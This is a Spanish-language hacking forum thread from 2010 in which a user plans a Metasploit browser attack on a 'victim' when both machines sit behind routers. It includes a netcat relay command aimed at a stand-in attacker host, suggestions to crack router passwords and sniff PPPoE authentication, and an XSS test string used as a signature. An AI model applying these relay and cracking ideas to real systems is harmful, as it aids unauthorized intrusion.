elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Servidor y Cliente detras de router/firewall
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Servidor y Cliente detras de router/firewall  (Leído 5,466 veces)
R007h

Desconectado Desconectado

Mensajes: 109

<script>alert('xss');</script>


Ver Perfil WWW
Servidor y Cliente detras de router/firewall
« en: 15 Diciembre 2010, 18:42 pm »

Hola,

Que pasa si el atacante y la victima estan detras de un router/firewall y no se tiene acceso a ninguno de los dos(routers)?

Hay alguna manera de utilizar MSF a travez de IRC?

Existe algun *MSFProxy*?

Escenario: La computadora del atacante se encuentra detras de un router al cual no se tiene acceso. La computadora objetivo tambien se encuentra detras de un router al cual no se tiene acceso. La computadora objetivo tiene un navegador vulnerable, y corre con un usuario restringido (no administrador).

Seria posible utilizar netcat como proxy para redirigir un ataque de MSF al browser?

Funcionaria si se redirecciona el ataque a travez de una computadora con acceso directo a inet o que esta detras de un router del que se tiene acceso utilizando netcat asi:
Código:
nc -d -L -p 8080 | nc ip.del.atacante.org 8080

Gracias, espero respuestas creativas xD jaja
Salu2
 
En línea

<script>alert('xss');</scrip>
inverse

Desconectado Desconectado

Mensajes: 74


-.-


Ver Perfil
Re: Servidor y Cliente detras de router/firewall
« Respuesta #1 en: 15 Diciembre 2010, 20:28 pm »

No le he dado muchas vueltas al tema, pero lo que si te puedo aclarar es que si no tienes acceso a tu router (suponiendo que seas el atacante), no vas a poder redireccionar el trafico a tu PC aunque sea conexion inversa...
Otra cosa es que escanees TU router(atacante), haya algun puerto abierto apuntando a algun host de la lan(olvidate de los tipicos 80,21,etc que seran para configurar el router), probar con el rango de ips una por una hasta dar con la correcta(o puedes sniffar en lan a ver que se cuece:) enfin que igual acabas antes sacando la pw del router tio xD
Exploits para irc ni idea... Seria cuestion de saber que cliente usa, que scripts tiene activos (IRCAP,etc) y googlear...
Si luego se me ocurre algo posteo.


En línea

R007h

Desconectado Desconectado

Mensajes: 109

<script>alert('xss');</script>


Ver Perfil WWW
Re: Servidor y Cliente detras de router/firewall
« Respuesta #2 en: 15 Diciembre 2010, 21:03 pm »

Gracias por responder...

si, ya sabia, es que me equivoque.. era asi
Código:
nc -d -L -p 8080 | nc -d -L -p 8080
pero tampoco se podria ya que el exploit para el browser es un servidor...
ademas eso de spoofear en la LAN para usar un puerto ya abierto en el router no es posible ya que estoy en una especie de pppoe vpn y el arp poisoning se hace complicado :S

el router del lado del atacante tiene MikroTik RouterOS y ya he intentado obtener acceso y no hubo suerte xD

podria tambien explotar desde la tercer maquina (proxy) y solo redireccionar la shell xD pero eso lo voy a tener que programar yo xD

Alguna otra alternativa?

Salu2

En línea

<script>alert('xss');</scrip>
R007h

Desconectado Desconectado

Mensajes: 109

<script>alert('xss');</script>


Ver Perfil WWW
Re: Servidor y Cliente detras de router/firewall
« Respuesta #3 en: 17 Diciembre 2010, 18:32 pm »

no?, nada?

y que tal algo de pppoe?
que se puede hacer en una pppoe?? se puede sniffar? se puede crackear?

autentificaciones CHAP PAP?

he intentado sniffar en la interfaz ppp0 pero solo veo trafico UDP mayormente consultas DNS
En línea

<script>alert('xss');</scrip>
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines